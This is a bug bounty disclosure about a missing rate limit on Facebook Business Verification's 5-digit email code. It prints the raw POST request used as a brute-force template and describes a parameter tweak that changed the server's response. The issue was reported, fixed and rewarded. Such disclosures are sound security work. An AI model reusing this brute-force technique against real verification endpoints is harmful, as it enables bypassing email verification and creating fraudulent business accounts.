Absence of Rate Limit in Facebook Business Verification ($2000 Bounty)
Facebook Business Verification is crucial for establishing the authenticity of users and businesses on the platform. By verifying their businesses, users gain access to features and permissions that enable interactions with other businesses and their data
During my testing, I identified a rate-limiting issue within the business verification process. Specifically, when a user was required to enter a 5-digit code received via email, there was no effective rate limit in place. This oversight allowed me to exploit the vulnerability by attempting to brute-force the code without the server blocking my IP address.
POST Request
POST /business_verification/challenge/verify/ HTTP/1.1
Host: business.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://business.facebook.com/settings/security/business_verification?business_id=xxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
Connection: close
Cookie: // User cookie
submission_id=xxxxxxxxxxx&challenge_code=<Paylaod>&challenge_type=email&indexed_id&__user=xxxxxxxxxxxxx&__a=1&__dyn=7xeUmFoO2CeCExUS2qq7E-8GAdyedKnFwn8eVEpyA5EK32q1oxy5Qdgdp98SmaDxW4E8U6ydwJyFEeo8p8-cx210wExuEixycx68w825ocEixWq1owvo7OqbwOzXwKzUeA9wRyUvyolyU6XximbDxeiUdo62iczErK2x0ZxzyGw8nz8a84q1UKh7wg8OqawywWg8oty88E4u2l2Utgvx-6U4a78K0AEbGg9ojwgEmy8eE&__req=y&__be=1&__pc=PHASED%3Abrands_pkg&dpr=1&__rev=1000997435&__s=%3Aen9sbg%3Axzvz6h&__hsi=6719306340508947313-0&fb_dtsg=AQFxSKvkuzNy%3AAQGIG2HsP1Ju&jazoest=22133As I experimented with the request, I noticed that altering the parameters led to different error messages. After removing the “__req=y&__be=1” parameter, I discovered that the error message changed to “You have entered the wrong code! Please try again!” Realizing the significance of this finding, I promptly reported the issue to Facebook’s security team, who confirmed its validity.
Impact
Exploiting this vulnerability would enable an attacker to bypass email verification and potentially create fake business accounts using legitimate email addresses of business owners.
Timeline
- July 30, 2019: Report submitted
- July 30, 2019: Triage
- April 15, 2020: Issue resolved, and $2000 bounty awarded
